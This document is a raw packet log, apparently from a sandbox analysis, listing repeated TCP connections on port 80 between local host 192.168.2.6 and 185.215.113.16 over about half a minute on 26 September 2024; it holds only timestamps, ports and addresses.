Sep 26, 2024 18:29:13.684853077 CEST	49729	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:13.685236931 CEST	49730	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:13.693380117 CEST	80	49729	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:13.693392992 CEST	80	49730	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:13.693463087 CEST	49729	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:13.693511009 CEST	49730	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:13.693623066 CEST	49730	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:13.699197054 CEST	80	49730	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:14.480070114 CEST	80	49730	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:14.480283976 CEST	49730	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:14.480901957 CEST	49730	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:14.487703085 CEST	80	49730	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:14.717986107 CEST	80	49730	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:14.718044996 CEST	49730	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:14.825572968 CEST	49730	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:14.825840950 CEST	49731	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:14.847107887 CEST	80	49731	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:14.847290993 CEST	49731	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:14.847330093 CEST	49731	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:14.847551107 CEST	80	49730	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:14.847601891 CEST	49730	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:14.852680922 CEST	80	49731	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:15.571053028 CEST	80	49731	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:15.571253061 CEST	49731	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:15.572169065 CEST	49731	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:15.577330112 CEST	80	49731	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:15.804568052 CEST	80	49731	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:15.804819107 CEST	49731	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:15.919186115 CEST	49731	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:15.919545889 CEST	49732	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:15.926763058 CEST	80	49732	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:15.926832914 CEST	49732	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:15.926969051 CEST	49732	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:15.929075003 CEST	80	49731	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:15.929132938 CEST	49731	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:15.933978081 CEST	80	49732	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:16.653939962 CEST	80	49732	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:16.654148102 CEST	49732	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:16.654900074 CEST	49732	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:16.660229921 CEST	80	49732	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:16.881238937 CEST	80	49732	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:16.881344080 CEST	49732	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:16.997498989 CEST	49732	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:16.998038054 CEST	49733	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:17.004578114 CEST	80	49733	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:17.004651070 CEST	49733	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:17.004812002 CEST	49733	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:17.005757093 CEST	80	49732	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:17.005827904 CEST	49732	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:17.010277987 CEST	80	49733	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:17.728404999 CEST	80	49733	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:17.728560925 CEST	49733	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:17.729402065 CEST	49733	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:17.737950087 CEST	80	49733	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:17.971012115 CEST	80	49733	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:17.971127987 CEST	49733	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:18.078527927 CEST	49733	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:18.078891993 CEST	49734	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:18.086524010 CEST	80	49734	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:18.086591005 CEST	49734	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:18.086746931 CEST	49734	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:18.087620974 CEST	80	49733	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:18.087682009 CEST	49733	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:18.092941999 CEST	80	49734	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:18.797792912 CEST	80	49734	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:18.797981024 CEST	49734	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:18.806365013 CEST	49734	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:18.828278065 CEST	80	49734	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:19.049438000 CEST	80	49734	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:19.049611092 CEST	49734	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:19.165424109 CEST	49734	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:19.166315079 CEST	49735	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:19.174355984 CEST	80	49735	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:19.174506903 CEST	49735	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:19.174683094 CEST	49735	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:19.180918932 CEST	80	49734	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:19.181024075 CEST	49734	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:19.181303024 CEST	80	49735	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:19.901345968 CEST	80	49735	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:19.901496887 CEST	49735	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:19.902298927 CEST	49735	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:19.912622929 CEST	80	49735	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:20.134442091 CEST	80	49735	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:20.134593010 CEST	49735	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:20.249525070 CEST	49735	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:20.249867916 CEST	49736	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:20.278122902 CEST	80	49736	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:20.278215885 CEST	49736	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:20.278815031 CEST	49736	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:20.288434029 CEST	80	49735	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:20.288536072 CEST	49735	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:20.291246891 CEST	80	49736	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:21.052167892 CEST	80	49736	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:21.052289009 CEST	49736	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:21.053067923 CEST	49736	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:21.064383030 CEST	80	49736	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:21.290230036 CEST	80	49736	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:21.290306091 CEST	49736	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:21.404299021 CEST	49736	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:21.404866934 CEST	49737	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:21.431756973 CEST	80	49737	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:21.431930065 CEST	49737	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:21.431972027 CEST	80	49736	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:21.432045937 CEST	49736	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:21.432295084 CEST	49737	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:21.437967062 CEST	80	49737	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:22.162587881 CEST	80	49737	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:22.162810087 CEST	49737	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:22.163767099 CEST	49737	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:22.169615984 CEST	80	49737	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:22.435724974 CEST	80	49737	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:22.436100960 CEST	49737	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:22.546247959 CEST	49737	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:22.546736002 CEST	49738	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:22.554016113 CEST	80	49737	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:22.554121971 CEST	49737	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:22.554683924 CEST	80	49738	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:22.554810047 CEST	49738	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:22.555008888 CEST	49738	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:22.577647924 CEST	80	49738	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:23.290199995 CEST	80	49738	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:23.290363073 CEST	49738	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:23.296442986 CEST	49738	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:23.302946091 CEST	80	49738	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:23.525418997 CEST	80	49738	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:23.525593996 CEST	49738	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:23.643661022 CEST	49738	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:23.644031048 CEST	49739	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:23.673084974 CEST	80	49739	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:23.673222065 CEST	49739	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:23.673394918 CEST	49739	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:23.683264971 CEST	80	49738	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:23.683280945 CEST	80	49739	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:23.683353901 CEST	49738	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:24.420269012 CEST	80	49739	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:24.420348883 CEST	49739	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:24.536663055 CEST	49739	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:24.549959898 CEST	80	49739	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:24.802232981 CEST	80	49739	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:24.802325964 CEST	49739	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:24.903702974 CEST	49739	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:24.904067993 CEST	49740	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:24.933105946 CEST	80	49739	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:24.933120966 CEST	80	49740	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:24.933223009 CEST	49739	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:24.933288097 CEST	49740	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:24.933429956 CEST	49740	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:24.944477081 CEST	80	49740	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:25.663999081 CEST	80	49740	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:25.664067030 CEST	49740	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:25.664874077 CEST	49740	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:25.669975042 CEST	80	49740	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:25.897031069 CEST	80	49740	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:25.897119999 CEST	49740	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:26.013118982 CEST	49740	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:26.013495922 CEST	49741	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:26.021739006 CEST	80	49741	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:26.021862984 CEST	49741	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:26.021989107 CEST	49741	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:26.022800922 CEST	80	49740	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:26.022866011 CEST	49740	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:26.027209044 CEST	80	49741	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:26.732294083 CEST	80	49741	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:26.732378960 CEST	49741	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:26.733172894 CEST	49741	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:26.738898993 CEST	80	49741	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:26.962781906 CEST	80	49741	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:26.962892056 CEST	49741	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:27.075694084 CEST	49741	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:27.076086998 CEST	49742	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:27.081084967 CEST	80	49741	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:27.081152916 CEST	49741	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:27.081253052 CEST	80	49742	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:27.081312895 CEST	49742	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:27.081470966 CEST	49742	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:27.086656094 CEST	80	49742	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:27.803015947 CEST	80	49742	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:27.803163052 CEST	49742	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:27.804039001 CEST	49742	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:27.808970928 CEST	80	49742	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:28.034357071 CEST	80	49742	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:28.034468889 CEST	49742	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:28.138343096 CEST	49742	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:28.138531923 CEST	49743	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:28.144078016 CEST	80	49742	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:28.144156933 CEST	49742	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:28.144929886 CEST	80	49743	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:28.145010948 CEST	49743	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:28.145132065 CEST	49743	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:28.149971008 CEST	80	49743	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:28.856002092 CEST	80	49743	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:28.856128931 CEST	49743	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:28.857063055 CEST	49743	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:28.861855030 CEST	80	49743	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:29.083080053 CEST	80	49743	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:29.083190918 CEST	49743	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:29.255023956 CEST	49743	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:29.255707979 CEST	49744	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:29.260158062 CEST	80	49743	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:29.260232925 CEST	49743	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:29.260531902 CEST	80	49744	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:29.260597944 CEST	49744	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:29.261415958 CEST	49744	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:29.266726971 CEST	80	49744	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:29.961617947 CEST	80	49744	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:29.961729050 CEST	49744	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:29.963866949 CEST	49744	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:29.968734980 CEST	80	49744	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:30.191232920 CEST	80	49744	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:30.191317081 CEST	49744	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:30.294405937 CEST	49744	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:30.294748068 CEST	49746	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:30.299664021 CEST	80	49746	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:30.299678087 CEST	80	49744	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:30.299772978 CEST	49746	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:30.299777031 CEST	49744	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:30.299949884 CEST	49746	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:30.304878950 CEST	80	49746	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:31.020965099 CEST	80	49746	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:31.021019936 CEST	49746	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:31.021889925 CEST	49746	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:31.026767015 CEST	80	49746	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:31.246807098 CEST	80	49746	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:31.247041941 CEST	49746	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:31.357167006 CEST	49746	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:31.357800007 CEST	49747	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:31.362435102 CEST	80	49746	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:31.362688065 CEST	80	49747	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:31.362777948 CEST	49746	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:31.362879038 CEST	49747	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:31.363454103 CEST	49747	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:31.368345022 CEST	80	49747	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:32.052800894 CEST	80	49747	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:32.052903891 CEST	49747	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:32.053829908 CEST	49747	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:32.058851004 CEST	80	49747	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:32.276709080 CEST	80	49747	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:32.276838064 CEST	49747	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:32.388500929 CEST	49747	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:32.388885021 CEST	49748	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:32.393942118 CEST	80	49748	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:32.394072056 CEST	49748	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:32.394089937 CEST	80	49747	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:32.394150972 CEST	49747	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:32.394277096 CEST	49748	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:32.399065018 CEST	80	49748	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:33.131731033 CEST	80	49748	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:33.131889105 CEST	49748	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:33.132818937 CEST	49748	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:33.137630939 CEST	80	49748	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:33.369824886 CEST	80	49748	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:33.369930983 CEST	49748	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:33.482052088 CEST	49748	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:33.482482910 CEST	49749	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:33.487317085 CEST	80	49749	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:33.487428904 CEST	49749	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:33.487435102 CEST	80	49748	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:33.487492085 CEST	49748	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:33.487636089 CEST	49749	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:33.492433071 CEST	80	49749	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:34.185514927 CEST	80	49749	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:34.185595036 CEST	49749	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:34.603547096 CEST	49749	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:34.608366013 CEST	80	49749	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:34.830221891 CEST	80	49749	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:34.830295086 CEST	49749	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:34.935337067 CEST	49749	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:34.935705900 CEST	49750	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:34.940536022 CEST	80	49749	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:34.940634012 CEST	49749	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:34.941025972 CEST	80	49750	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:34.941106081 CEST	49750	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:34.941252947 CEST	49750	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:34.946259022 CEST	80	49750	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:35.641802073 CEST	80	49750	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:35.641976118 CEST	49750	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:35.642966986 CEST	49750	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:35.647855997 CEST	80	49750	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:35.866833925 CEST	80	49750	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:35.866899967 CEST	49750	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:35.981966972 CEST	49750	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:35.982330084 CEST	49751	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:36.258162975 CEST	80	49751	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:36.258220911 CEST	80	49750	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:36.258361101 CEST	49751	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:36.258529902 CEST	49750	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:36.258687019 CEST	49751	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:36.263722897 CEST	80	49751	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:37.126147985 CEST	80	49751	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:37.129421949 CEST	49751	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:37.132106066 CEST	49751	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:37.136895895 CEST	80	49751	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:37.368777990 CEST	80	49751	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:37.368901014 CEST	49751	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:37.481903076 CEST	49751	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:37.482222080 CEST	49752	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:37.487590075 CEST	80	49752	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:37.487663984 CEST	80	49751	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:37.487700939 CEST	49752	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:37.487736940 CEST	49751	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:37.487869978 CEST	49752	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:37.493422031 CEST	80	49752	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:38.355880976 CEST	80	49752	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:38.355988979 CEST	49752	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:38.359211922 CEST	49752	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:38.364073992 CEST	80	49752	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:38.586429119 CEST	80	49752	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:38.586565971 CEST	49752	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:38.700783014 CEST	49752	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:38.701178074 CEST	49753	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:38.706163883 CEST	80	49752	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:38.706248999 CEST	80	49753	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:38.706264019 CEST	49752	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:38.706346035 CEST	49753	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:38.706530094 CEST	49753	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:38.711791039 CEST	80	49753	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:39.415940046 CEST	80	49753	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:39.416029930 CEST	49753	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:39.416851997 CEST	49753	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:39.421701908 CEST	80	49753	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:39.646142960 CEST	80	49753	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:39.646249056 CEST	49753	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:39.747596025 CEST	49753	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:39.747972965 CEST	49754	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:39.752815962 CEST	80	49754	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:39.752914906 CEST	80	49753	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:39.752914906 CEST	49754	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:39.752969980 CEST	49753	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:39.753189087 CEST	49754	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:39.757972956 CEST	80	49754	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:40.447009087 CEST	80	49754	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:40.447108030 CEST	49754	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:40.447995901 CEST	49754	80	192.168.2.6	185.215.113.16
